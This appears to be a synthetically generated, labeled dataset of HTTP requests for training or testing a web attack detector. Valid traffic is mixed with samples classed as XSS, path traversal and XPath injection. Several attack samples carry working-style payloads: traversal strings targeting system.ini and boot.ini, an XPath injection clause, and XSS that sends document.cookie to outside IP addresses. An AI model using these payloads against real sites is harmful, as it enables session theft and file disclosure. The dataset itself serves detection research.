If-None-Match: "Oqd6RO@j_Xomb36"
If-Range: Wed, 07 Mar 07 20:56:39 CET
Max-Forwards: 7
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: NTLM dHRtN29tZWlhZW5xdG90UmlldG44U2FyZWVyYzdueHRhNmFmZHNobEVybG4=
Authorization: Digest cnonce="ii2a"
Range: 397-33460,-9077,044523-
Referer: /eh2ph/yMtiR/beok/1mtteio/v7sxyl.zip
TE: deflate,trailers
Trailer: Transfer-Encoding
User-Agent: tslxaruadhya
UA-CPU: PowerPC
UA-Disp: 2800,8749,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 392x190
Via: HTTP/6.8 www.kuis.htm
Transfer-Encoding: kuscx
Upgrade: zufZE2/7.5, owei/6.5, slroee/5.9
Warning: 303 www.herida.css "typL" "Tue, 07 Mar 06 04:42:54 GMT"
X-Forwarded-For: 69.243.92.99
X-Serial-Number: 40823
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 784
Start - Id: 25168
class: Valid
GET /WVlikeQvbscriptPcmd7ujpUY3/rrieesyar78bs2.htm?T9nn=w3trSX-B&shffu1nseko=dr%3A%260+3gab2oSwxn%29+l&ilmGr=sweKl7nbodym&svn5a3=a&hE=%40mecseit%3Frnetcatt%7E&nanniWn9ef=0719017452&5@g2bRijAJQx=connecthomencexeciSnO%3EbetweendsmLg%5Be&ryh61debeonIflx=ihw3tstPresgd0mr&ebuiEempftt=0fistyle+oMprocessing-instructionax+i&tmehhsvasILx1tt=+l&mth8or=e18%5Cpx%25e&israeer8aDU=sa7so HTTP/1.0
Host: 99.202.200.241
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-japanese;q=0.8, windows-1258;q=0.6, x-mac-japanese, iso-8859-8
Accept-Encoding: *;q=0.3
Accept-Language: QbI-onsea, oe4h-o5oh;q=0.2, eitsna-b0ba;q=0.7, e-j
Cache-Control: no-cache
Client-ip: 3.143.186.155
Cookie: PocpassthruSWI@-e=emnidcedeaqweijoe;1npofure=443807677;hetsam6=Ieeval;eeienZ=7
Cookie2: $Version="99"
Date: Thu, 17 Nov 05 14:20:58 UTC
ETag: W/"H5UmMh.r4DbgYRT@Gvo3"
Expect: nk4eb9=seppiis
From: t6e6@olsywdnTj.it
If-Modified-Since: Fri, 03 Aug 07 08:57:02 UTC
If-Unmodified-Since: Mon, 23 Feb 04 17:24:07 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 10 Oct 05 11:30:28 UTC
Max-Forwards: 1
MIME-Version: 9.1
Pragma: odw='issfee'
Proxy-Authorization: NTLM eHVjMWU5b2lodGVzdG9Jd1R6Zm9kbW5paGgyck9hRTc=
Authorization: aetier 41ettep=qtihlcs
Range: 0550-
Referer: http://kecie.uk/95T5m4t/wlgd.gif
TE: trailers,trailers,trailers
Trailer: Expect
User-Agent: Mozilla/5.7 (compatible; Konqueror/3.6; Linux i386; ar8g6eeot; Oivm; hiaad5to3)
UA-CPU: Sparc
UA-Disp: 550,936,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5457x802
Via: valdrs/0.4 www.y9sddfr2.tiff:0, 5.5 www.tUSeyI.png:3, 6.9 163.95.1.208:1
Transfer-Encoding: identity
Upgrade: tIis/4.6
Warning: 814 www.tanns.gif "7et8naWmlnMpa" 
X-Forwarded-For: 54.93.72.103
X-Serial-Number: 39906730696975900354
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25168
Start - Id: 45722
class: PathTransversal
GET /i.UcaN4FEqyCplEMzn/l@zBWrk8/ueWeireRobn/e@xEpPP5ls6zSc_m/r9/iooiqn/eiD@Qjr-OKp@c/LI/dWt1sIoi/y8irXuM4tmpe4_.mdb?nanri4cgeierCeq=inputlccNrh%5Cn&Ioxdxwh=e4afFDYWq&gwuuN2opeo=etsotep40tndtf&aU=9&pngyetwTNCgk=%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fnt%2Fmaolli%2Fmate%2Ftistasolor.php4&eEBA=h8Bx HTTP/1.1
Host: 233.184.32.197:78372
Connection: EdboaQ
Accept: audio/x-wav, application/postscript, video/quicktime
Accept-Charset: x-mac-chinesetrad;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 213.38.176.90
Cookie: hyie1eo8leaOepu=612368;.6Vp1rSP4itH=epi\koouth
Cookie2: $Version="66"
Date: Fri, 08 Oct 04 11:51:17 GMT
ETag: W/"1HDzOZzjJta_eti"
Expect: E8io1m=9m68xA;ctn5kTae=znnvtbd
From: reani1tb@daeireeubl.de
If-Modified-Since: Fri, 16 Jul 04 06:14:09 CET
If-Unmodified-Since: Fri, 08 Sep 06 24:58:48 UTC
If-Match: *
If-None-Match: *
If-Range: "W4xl8_6kHpFOOQb"
Max-Forwards: 1148
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest opaque="pTar"
Range: -500252,934-3694
Referer: /wfabdvi/uapm/eOnSl.shtml
TE: gzip,trailers,trailers
Trailer: Cache-Control
User-Agent: tAomhb3j/2.7.5
UA-CPU: Sparc
UA-Disp: 664,891,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 967x7308
Via: FTP/5.1 www.IEbcnloh.tiff, 3.7 www.s6di.jpeg, 8.6 33.206.197.118
Transfer-Encoding: deflate
Upgrade: sz3/7.1, 6Dnd/4.3
Warning: 139 123.133.191.85 "aoRovfiyaetlwhiotHa" "Tue, 27 Apr 10 21:16:33 GMT"
X-Forwarded-For: 159.195.9.102
X-Serial-Number: 1618317
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 45722
Start - Id: 47348
class: XSS
GET /8Necho8k09Ol/tuattesbd/g@Gt4Ca11J9XYVvD/7WlMKP52waVT2.sh?dan=%3Cmeta++http-equiv++%3D%22+refresh+++++%22++content+%3D+%22+0%3Burl%3Djavascript%3A%5Balert++++%28%27etti%27%29%3B%5D%22++++%3E&a3e9vtaek=leDosat3&it3_DZC=drWaenaftfieaw HTTP/1.0
Host: 48.73.239.172
Connection: close
Accept: */*;q=0.7
Accept-Charset: cp-932;q=0.5, x-mac-korean
Accept-Encoding: gzip;q=0.6, identity, gzip;q=0.1, compress;q=0.6
Accept-Language: *
Cache-Control: no-store
Client-ip: 46.191.21.117
Cookie: neofs5arimtno=lsanybtsjeth;tsemimz=u5Naat]de8ehwfw[;x0F.S=sf(ni[;ijertnqARdxa=eydteNvpotr;ahlne=[wig
Cookie2: $Version="38"
Date: Sat, 10 May 08 17:05:27 CET
ETag: W/"hFEpGMyZ@tmbqYv"
Expect: 100-continue
From: d8Pnt@fyea.com
If-Modified-Since: Sat, 02 Sep 06 07:16:06 CET
If-Unmodified-Since: Thu, 04 Oct 07 14:44:48 CET
If-Match: "41N7uVb2xOKs1TsdNMMt"
If-None-Match: *
If-Range: Tue, 07 Oct 08 11:00:36 CET
Max-Forwards: 838
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="izenb6"
Authorization: NTLM V25oQTYxZmE5bmQwb29vcDNRb3Juc3lvbGFkSXloNGk=
Range: -066761,152-
Referer: http://OTpytke.ch/nnqdn/neys/qiteUd.mpg
TE: trailers,trailers,deflate
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.4 (compatible; Konqueror/6.7; WinNT; tse8eth)
UA-CPU: x86
UA-Disp: 699,6656,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 575x5791
Via: emor/0.7 www.Cninesed.jpg, 6.3 www.oroh.shtml, 2.6 98.139.179.165
Transfer-Encoding: compress
Upgrade: ni4st/4.0, 7issa/1.3
Warning: 211 www.eefi.shtml "h0shftnyr" "Fri, 11 Nov 05 13:58:15 GMT"
X-Forwarded-For: 216.123.220.178
X-Serial-Number: 0450626600564347
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47348
Start - Id: 47142
class: XSS
GET /eM0L_C7UVf_yKXD/vyWFmR@Gay/ameiLhsauohY1axe5/mtr/rDyTuI91YRwFo.7a/iYvC/eyksdhutVU-P8/opaRzZ/0e/0oetntdwrMhiii/esiefunexkoe/vs.html?Srqy=ondytfU&wE=366&P8Dp2binl=eerooE&1object3zCzUF=ouPp&hme=%3Ca++href++++%3D+++%22++javas%26%2399%3Bript%26%2335%3B%5Bwindow.open%28%27http%3A%2F%2F154.40.227.112%2Froolte.exe%27%2Bdocument.cookie%29%3B%5D%22++%3E HTTP/1.1
Host: 123.248.200.155
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *;q=0.2
Accept-Encoding: deflate;q=0.4, deflate;q=0.7
Accept-Language: *;q=0.8
Cache-Control: eeafhei=Phh2ds
Client-ip: 194.231.176.241
Cookie: thaa4vt7t7Olt=G=vb
Cookie2: $Version="9"
Date: Fri, 07 Apr 06 23:45:26 UTC
ETag: W/"h8GIdQBR_P5h.4Cev5X"
Expect: 100-continue
From: xeliaGtt@ccieug.de
If-Modified-Since: Fri, 24 Aug 07 17:42:58 CET
If-Unmodified-Since: Mon, 27 Apr 09 04:33:52 GMT
If-Match: *
If-None-Match: "UdGQgBJJXIMgwNCtTiI6"
If-Range: *
Max-Forwards: 92
MIME-Version: 6.6
Pragma: oex=8imwuea
Proxy-Authorization: Digest nc=e04736F8
Authorization: NTLM bnJ0MHUzNGkzYjVhaXZyYXdlY29sOXJvZGlvbnNhc290b3Jscw==
Range: -35233,639-
Referer: /zooh83oj/jyt2ooa/tnDtpnt/oeo9arnl.asp
TE: trailers
Trailer: Cache-Control
User-Agent: g9yTnj0dQt http://www.pao5r.de
UA-CPU: 68000
UA-Disp: 2636,076,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 6020x621
Via: 5.5 201.223.246.78, 4.4 www.e0sar.css
Transfer-Encoding: deflate
Upgrade: oslis0/7.1
Warning: 339 51.64.209.7 "6Kirtt2tetFxoo" "Fri, 17 Oct 08 02:00:42 UTC"
X-Forwarded-For: 77.180.133.237
X-Serial-Number: 54001451967
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47142
Start - Id: 19894
class: Valid
GET /-qLOSKSu/N96/oyHRTZshw1.akL/rj.tiff?4Rpunioii20q=3681 HTTP/1.0
Host: 159.61.7.214
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.2
Accept-Language: l-dan4cdEo;q=0.9, iamatsr-e, eaO-seAuee4a;q=0.3
Cache-Control: max-stale=9861
Client-ip: 4.89.255.88
Cookie: rsipaMdul=eetj;tpp3ln=Yeqass O
Cookie2: $Version="20"
Date: Sun, 19 Oct 08 12:26:02 UTC
ETag: "sMYKdZPm1IVvlEO"
Expect: dfhaseA=enbhte;eaotIr=auhdL
From: clskl2lR@edinvtjit.biz
If-Modified-Since: Sun, 06 Nov 05 07:57:10 GMT
If-Unmodified-Since: Sun, 20 May 07 16:54:24 GMT
If-Match: "hn8SMmnS4dmyA3R9Y"
If-None-Match: "QzoR40qnU6j8cMqm8sl"
If-Range: *
Max-Forwards: 31
MIME-Version: 2.6
Pragma: em=Nc
Proxy-Authorization: Basic ZWxZekFhYXU6bnFpRXlwNw==
Authorization: Basic M2U0ZTpyV3NnOHY=
Range: 3910-41090
Referer: /eawnq.bin
TE: gzip,trailers,gzip
Trailer: Authorization
User-Agent: diwIndp5Q/5.6.3
UA-CPU: x86
UA-Disp: 1517,0390,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 205x6501
Via: FTP/7.3 218.246.228.116, 9.4 26.238.102.41
Transfer-Encoding: compress
Upgrade: aSn/7.4
Warning: 685 www.isaEsseD.gif:062 "W1rtCsegr" 
X-Forwarded-For: 176.249.106.242
X-Serial-Number: 11565952861690
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19894
Start - Id: 16561
class: Valid
GET /e3N/5socrScaaddtauw/rwmochaMdpkVY/kolIC64/liwxE/jsspQwAhteshSrtrgle9/h3imI_wjUiL1Ebr3.gif?lrsAr13rsbxola=Reme&igg3naitPp=708&4Any=i6hn&tEkos3ka2=agkFBqYpX&Ohe=bgjedR&aika=aiiuAcI3Ot&t6nmlrnionetmhe=49637341 HTTP/1.1
Host: www.rtMok7ih.net:29028
Connection: keep-alive
Accept: text/*
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: max-age=10
Client-ip: 116.105.195.45
Cookie: eje1sebutacE=8
Cookie2: $Version="756"
Date: Thu, 05 Aug 04 02:37:54 GMT
ETag: W/"SPJ7CYaB6FJQiYrjAH"
Expect: anso=emn1tqz
From: o7mnatoB@rrengt.ch
If-Modified-Since: Wed, 17 Jun 09 05:18:05 CET
If-Unmodified-Since: Sat, 02 Aug 08 17:30:43 CET
If-Match: "-w@ljd9WdfjUgnd"
If-None-Match: *
If-Range: Wed, 17 Mar 04 08:04:51 GMT
Max-Forwards: 05
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: NTLM YWllc2F0MWFzbGUzaFJuZWN1d3FmYW1SdE9lUGNkUGVlZ29vb2lnYXd0OG5lYw==
Authorization: Basic aHJkeW5kcGU6c25uZWVh
Range: -098113
Referer: /la7yn.jpg
TE: deflate;q=0.6
Trailer: If-Range
User-Agent: Mozilla/5.1 (Windows; U; Windows NT 0.5; aA-to; rv:9.8.5) Gecko/26554518
UA-CPU: 68000
UA-Disp: 4716,720,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 9430x4545
Via: HTTP/4.0 www.Dlvh.jpeg:09, HTTP/5.5 61.167.52.176
Transfer-Encoding: compress
Upgrade: ere0/9.6
Warning: 516 www.depn.jpeg "etvr6cs" "Wed, 28 Mar 07 21:45:30 GMT"
X-Forwarded-For: 184.226.48.9
X-Serial-Number: 4070028617537255
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16561
Start - Id: 48843
class: XPathInjection
GET /teebnglq/uhonv6sytas9teEbee/iQzSupJT-J0.P/tIezroaese8Et/eaAUUjkO/om2Lae/qWY7YOgKHlArU7/h4ra.gif?ewyoeoeEwr=Oe5le%27+or+path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++or++%27qomcIs2d%27+%3D+++%27 HTTP/1.0
Host: 209.174.229.238
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, deflate;q=0.0
Accept-Language: *
Cache-Control: max-age=70
Client-ip: 232.170.36.208
Cookie: ds=154691665;argtekrereru4=lpassthru=r2soesooe
Cookie2: $Version="999"
Date: Fri, 30 Apr 10 10:40:25 GMT
ETag: W/"8E1nvDiVlYEiyT9TELZx"
Expect: iutdtan
From: w2h3rar@tkko9pi.org
If-Modified-Since: Tue, 16 Feb 10 21:17:02 UTC
If-Unmodified-Since: Wed, 11 Mar 09 14:52:48 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 07 Dec 08 12:10:35 GMT
Max-Forwards: 984
MIME-Version: 6.2
Pragma: yt28lanr='yeugo'
Proxy-Authorization: Digest nc=412BEE2D
Authorization: iuut ieiRnfr=Svncz
Range: 5-03627
Referer: http://www.rkvluip.cz/7bilod/x4tso/sdaM9xb.swf
TE: gzip;q=0.8
Trailer: Accept-Charset
User-Agent: Mozilla/5.6 (compatible; iff8f6oD; Linux i386; tai5i2ahs)
UA-CPU: StrongARM
UA-Disp: 780,9634,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0867x2824
Via: HTTP/7.0 www.1elw.gif
Transfer-Encoding: deflate
Upgrade: qdiue/5.0
Warning: 266 252.104.26.149 "9bdidtHc" "Thu, 01 Nov 07 22:00:30 GMT"
X-Forwarded-For: 239.247.179.124
X-Serial-Number: 177199337529573688
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48843
Start - Id: 45831
class: PathTransversal
GET /l_deQfYUs/TMEV/e19P2jPA.mIr6S/Lot3ehceeog0omagiu/oeHa3xre/M_X-H7VxrcUS1E/5isDieayt/g0/ZL_.tiff?mEmrfTetarmTr=9vob2ltsr7etea&nmee=..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&asuda0nuyel=395842&iazE0ifhr=2&ouzi=pFSA8sB&brGiwasee=hn58nr&nup=8943145&yme=Gkc3%27+wylocationlgnl&ebrvarm=eiiloeeavaer6ci&bDFFOeW=%3Be&lbNqjnteEeou=jecmd%28un&mlzisecltizos=aAjnqbtnPjr&tTop=l%25ce%28ibcaules%3A&riix=23&Oadminz3shtpassY=f%2F%27mgl HTTP/1.1
Host: 148.95.10.165
Connection: meE6rls
Accept: text/*, audio/*;q=0.8, text/*
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: hadeawe-hf1iy, tmj3-E
Cache-Control: min-fresh=65446
Client-ip: 222.47.112.199
Cookie: ajtajotb=85;aawqbdEMD=nhtacces@;jahh9nt=fn2l6eiR;nnue=oxDA@41P.X4c
Cookie2: $Version="38"
Date: Sat, 28 Jan 06 04:15:59 UTC
ETag: W/"0Tmw.hj-HlQDAFpQyyGj"
Expect: tons32
From: ix4abcph@mnt9ssu.gov
If-Modified-Since: Sun, 06 Aug 06 08:42:43 UTC
If-Unmodified-Since: Sat, 26 May 07 01:41:56 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2934
MIME-Version: 9.7
Proxy-Authorization: Digest uri=http://www.ncrl8sh.ch/2nled.asp
Authorization: maar j1ewnj=rafG2
Range: 09236-
Referer: /graal.tar
TE: gzip;q=0.0
Trailer: If-Modified-Since
User-Agent: Mozilla/8.3 (compatible; Konqueror/5.8; Open BSD i586; rIjr6nrq7; RoniteeQ)
UA-CPU: MIPS
UA-Color: color8
UA-Pixels: 1524x385
Via: HTTP/5.5 www.hnrenne.png, FTP/9.9 www.0mda.jpeg:63542
Transfer-Encoding: compress
Upgrade: osu6/8.7, l2hene/7.8, eas/3.6, aeor6c/3.1
Warning: 559 www.tI7c.css "nAtao" 
X-Serial-Number: 25397478987579
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45831
Start - Id: 46603
class: XSS
GET /sav5B097V@vXhLxi/ymIkVf8/LGJzW8_B/tHM2FHG_@U/0NLoDk_Vxo2X7_w.php3?g5=ngsghooty%3Cahwue+ HTTP/1.0
Host: www.n3tdo6nht.it
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: windows-1253;q=0.2, iso-8859-9, x-mac-greek;q=0.4, x-mac-chinesesimp;q=0.5, x-mac-ce
Accept-Encoding: deflate;q=0.1, gzip;q=0.0
Accept-Language: <xml src =    "   javascript:    [window.open('http://213.77.184.103/toal.aspx'+document.cookie);]    ">
Cache-Control: max-age=3602
Client-ip: 115.60.4.78
Cookie2: $Version="8"
Date: Fri, 28 Aug 09 08:08:52 CET
ETag: W/"i1SzQL9_A_G6IGY"
From: Jthbz@Aett6xa.be
If-Modified-Since: Wed, 19 Nov 08 22:58:06 CET
If-Unmodified-Since: Sat, 05 Feb 05 04:47:29 GMT
If-Match: *
If-Range: *
Max-Forwards: 65
MIME-Version: 0.9
Pragma: sdeenei=mzc
Authorization: Digest qop=auth-int
Range: 29-,197659-,4-7273
Referer: http://hts0Z.de/Erma/zEzksnht/titdv/i88eLb/oapnd.php
TE: deflate;q=0.6,trailers,deflate
User-Agent: Mozilla/0.2 (X11; U; Unix 9.9; rw-6n; rv:8.8.9) Gecko/26350432
UA-CPU: x86
Via: HTTP/2.7 175.0.56.161, edlh/8.8 www.ifKXh.jpg:98522, 4.2 81.82.128.233
Transfer-Encoding: deflate
Upgrade: 1ssnt/2.7, Necil/0.4

null

End - Id: 46603
Start - Id: 19883
class: Valid
GET /sB.l/kCFajdraGyI9jB.html?FBea-5csock_streamPd=Tnx&wyuIrAfa7dm=1221 HTTP/1.1
Host: www.raes.net
Connection: close
Accept: text/*;q=0.2, video/quicktime
Accept-Charset: *
Accept-Encoding: compress, deflate;q=0.0, identity, deflate;q=0.4, compress;q=0.3
Accept-Language: aueEa8i1-es1h;q=0.5, Unn-DRahlho;q=0.7, eart-eciem, d-iTa;q=0.1, 4ton4i2-M;q=0.0
Cache-Control: no-transform
Client-ip: 80.193.119.62
Cookie: inrE=i2aWricormyd;DdTdEfejsrsnt=xUKZq@;elny=rtd
Cookie2: $Version="70"
Date: Sun, 11 Feb 07 02:01:26 GMT
ETag: "ylFp1e@@p02JqW5p"
Expect: etaa=zrsedon
From: 0nO7ys@itae.cz
If-Modified-Since: Fri, 10 Feb 06 15:32:33 CET
If-Unmodified-Since: Tue, 08 Jul 08 09:42:20 UTC
If-Match: *
If-None-Match: "SV3QHI9iBdxfD2a"
If-Range: *
Max-Forwards: 199
MIME-Version: 6.7
Pragma: o7='rrttN'
Proxy-Authorization: tIsore haesemqr=7tm5
Authorization: Basic cm9hbjphcm9xcjlzRQ==
Range: 2-
Referer: /muidc/vy8r9zh/hdtnHwtz.php
TE: gzip;q=0.8,trailers,deflate
Trailer: Authorization
User-Agent: so4ge2iot (heEsU5)
UA-CPU: StrongARM
UA-Disp: 1517,0390,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 205x6501
Via: nfq/2.6 www.wenta.jpg
Transfer-Encoding: setynt; rlrseef=oh32tdo
Upgrade: aSn/7.4
Warning: 796 165.248.243.125:49 "nsa0mTYgni7ti" "Wed, 31 Mar 10 02:21:30 UTC"
X-Forwarded-For: 176.249.106.242
X-Serial-Number: 11565952861690
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19883
Start - Id: 36158
class: PathTransversal
GET /tu4orottruMoOcoatet/K1rmo%uR3Imocha.c@5/wpsSVg5Kp_Lhk3pm0F/aNKfrom3vwhl/lronfuljd9/6K1xiQ58GVVdEIYDyK/i24i.htm?oonoxun=rt%3Ev&eooew5lCeeooa=t+eot&htoEcu=T5ga&ck@lX43=t%3A%5Cwinnt%5Cboot.ini HTTP/1.1
Host: www.efu1le.cz
Connection: sdnni
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.9, identity
Accept-Language: *
Cache-Control: max-age=7
Date: Sat, 29 Mar 08 16:52:52 UTC
ETag: "u_8@O1_O@cim6wc3ZH"
From: rmee3leS@lenn.de
If-Modified-Since: Thu, 10 Dec 09 09:32:25 UTC
If-Unmodified-Since: Thu, 05 Apr 07 22:10:32 GMT
If-Match: "ElzUMg79vsWjlYT-UWa"
If-None-Match: "h9O8b96otIn5qzv00IgQ"
Max-Forwards: 6366
Pragma: emug=edieona
Proxy-Authorization: Basic Nmk1OGlyOnNIb2VmZQ==
Authorization: Basic Y2F0dHJidDpzNHR0Y2hy
Referer: http://phTi.uk/anrsiu/8m4ty/Kgyec.mp3
User-Agent: Mozilla/8.8 (Windows; U; Windows NT 1.6; he-aa; rv:5.6.0) Gecko/36410108
UA-Color: color8
UA-Pixels: 5546x388
Via: HTTP/7.8 www.tuen.html
Transfer-Encoding: ensiie
Warning: 176 103.233.4.139 "gothscr7a4n" 
X-Forwarded-For: 11.225.138.134
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36158
Start - Id: 28571
class: Valid
GET /nEI3d5l3HS/YPwAinsert56/oh9uheumoittrisEoa8.asp?don5scu3ee=22&sssyo=ny92elKgtl3ou%3ELO&s5=stte6oheopleuaizbx&8mrur=odocument&efHvhreste=905475260&ernA8=eseosytrzEtnostaid&ie3rruof9iia=4083170&nqriaNxsKuejttI=%40aau&tIzlct0lotr3r=57338452&3yhr=saanhprocessing-instruction&F9GJDC.perlnph-c=9&wbok7nd=dAjs%40Yw1sM HTTP/1.1
Host: 217.196.150.163
Connection: close
Accept: text/html;q=0.6, audio/x-wav, text/plain;q=0.9
Accept-Charset: *
Accept-Encoding: compress;q=0.2, gzip;q=0.6, compress;q=0.0, gzip;q=0.7
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 32.126.230.226
Cookie: dexfi8b3=mailwns5 da;orhNgshp=ncneaf3'y0w;zoX=e-oid;tl=s/0laenph-?allecg;tB=iIEosr
Cookie2: $Version="5"
Date: Wed, 29 Oct 08 12:39:38 CET
ETag: W/"IlSB0SVupMAYKnpEoST"
Expect: 100-continue
From: itsrdeii@e8igfye.ch
If-Modified-Since: Thu, 14 Dec 06 23:23:19 CET
If-Unmodified-Since: Wed, 15 Apr 09 14:41:03 UTC
If-Match: *
If-None-Match: "ZRe3J2xgFxy4ouXJ3"
If-Range: *
Max-Forwards: 94
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: dothii rw4uoS=mtsNtaid
Authorization: Digest nonce
Range: 8-800450
Referer: /yneolH/lva8iwT/att0Vc.dll
TE: deflate
Trailer: If-Modified-Since
User-Agent: o94rtdcc
UA-CPU: StrongARM
UA-Disp: 3600,6698,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 5673x9154
Via: 9.4 178.234.36.50, HTTP/2.6 196.123.169.84, 3.2 240.73.201.10:195
Transfer-Encoding: Onst; 0lbt=na2tse
Upgrade: skz/8.9, 4ei/8.4
Warning: 468 www.sneau.gif "AtiWetrmedr3iaGrt" 
X-Forwarded-For: 247.244.131.237
X-Serial-Number: 37650652134780806
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 28571
Start - Id: 13975
class: Valid
GET /w2@Tk5jj7PP2yl/8NAKb.wPrj_44POP6VH.php?usgnbemsEdic=46709&loa=123321255&DwD0ura=q4%2Fene%29eiadvf1 HTTP/1.0
Host: 11.183.175.65
Connection: close
Accept: */*;q=0.1
Accept-Charset: iso-2022-kr;q=0.6, macintosh;q=0.6, utf-7, us-ascii, euc-cn
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 16.127.223.115
Cookie: ttk=:x
Cookie2: $Version="42"
Date: Sat, 15 Nov 08 24:08:18 GMT
ETag: W/"8JXFlRSCoI-nI9R6pUv"
Expect: bnaeity
From: sTsgewns@snfh4s.it
If-Modified-Since: Fri, 18 Jan 08 21:50:14 GMT
If-Unmodified-Since: Mon, 23 Feb 09 19:27:10 UTC
If-Match: "6wIa.bVFxpX.9xkc"
If-None-Match: "74sd4VC5IMRbtkcgV"
If-Range: *
Max-Forwards: 142
MIME-Version: 4.3
Pragma: axs=dmnAbh
Proxy-Authorization: NTLM dGliYmVwYU1oZXN6NXJlbkRvb2ZlYTh0aW5PcjFSZW9lbmJsZQ==
Authorization: NTLM RWs4eWxVZW90YXVpYXRzU3BweGFhTEVoenRtZWFsaUZkZWVjc24=
Range: -895005
Referer: /fnaRh1t.mdb
TE: gzip
Trailer: If-Unmodified-Since
User-Agent: Mozilla/0.0 (compatible; Konqueror/0.5; Mac OS X; ycnhx; uu9t)
UA-CPU: MIPS
UA-Disp: 7939,4903,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7780x7588
Via: 7.4 www.iiqenF3S.css:9776
Transfer-Encoding: identity
Upgrade: tiowa/3.9, SsnfV/0.1
Warning: 331 169.34.182.93:52 "segnerwEd" 
X-Forwarded-For: 231.230.155.168
X-Serial-Number: 738264285065396
----: ----------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 13975
Start - Id: 2854
class: Valid
GET /Y4lV/@xWEAt/eXjb6JgVn.A4-IbtuA6/stnmaiseiooAq/ntkAqsggem/lnetcat_Q/6yS9MP.Nrwu/gpaaetownawsho/sGAGm.gif?t07VsX0SRoR9=t.2w1WM1xu3X&amaRtdftooatcEa=1316544&sqodEw4ma=76137&jreol=26aCniaepo1d&Ci.AAR5=4208 HTTP/1.1
Host: www.taoned.it
Connection: close
Accept: audio/basic;q=0.3
Accept-Charset: x-mac-icelandic
Accept-Encoding: identity;q=0.1
Accept-Language: *
Cache-Control: max-stale=9485
Client-ip: 75.186.185.243
Cookie: tZ3ie3wd=dq@yf-agN
Cookie2: $Version="975"
Date: Fri, 11 Dec 09 14:37:50 UTC
ETag: "NjhsqOtV49g9a9O"
Expect: lnss
From: ontooib@ikmeqssL5.gov
If-Modified-Since: Fri, 09 May 08 15:13:02 GMT
If-Unmodified-Since: Mon, 14 Sep 09 21:51:54 UTC
If-Match: "yokQyT44r0@DWXORCjY"
If-None-Match: *
If-Range: Tue, 23 Sep 08 11:57:18 GMT
Max-Forwards: 6050
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: Basic bmFtYWg6NXMyYXY=
Authorization: Basic c3JpZ2FlSWU6ZTg4ZnloYg==
Range: 839-599
Referer: /4cmek/onn4oa/c4wo.asp
TE: gzip
Trailer: TE
User-Agent: Mozilla/7.1 (Machintosh; U; PPC 2.5; ir-at; rv:2.4.4) Gecko/56178030
UA-CPU: Sparc
UA-Disp: 9780,426,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 0527x960
Via: 3.7 www.cbnamct.tiff, O9teot/8.9 www.1Raee.css:4734
Transfer-Encoding: compress
Upgrade: dp5e/7.1, 6Wocs/8.4, sytonn/2.0, a4edeH/0.9
Warning: 820 www.ihNeie.html "srgeAedfihnrsmewv" 
X-Forwarded-For: 205.119.197.218
X-Serial-Number: 674535146316
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2854
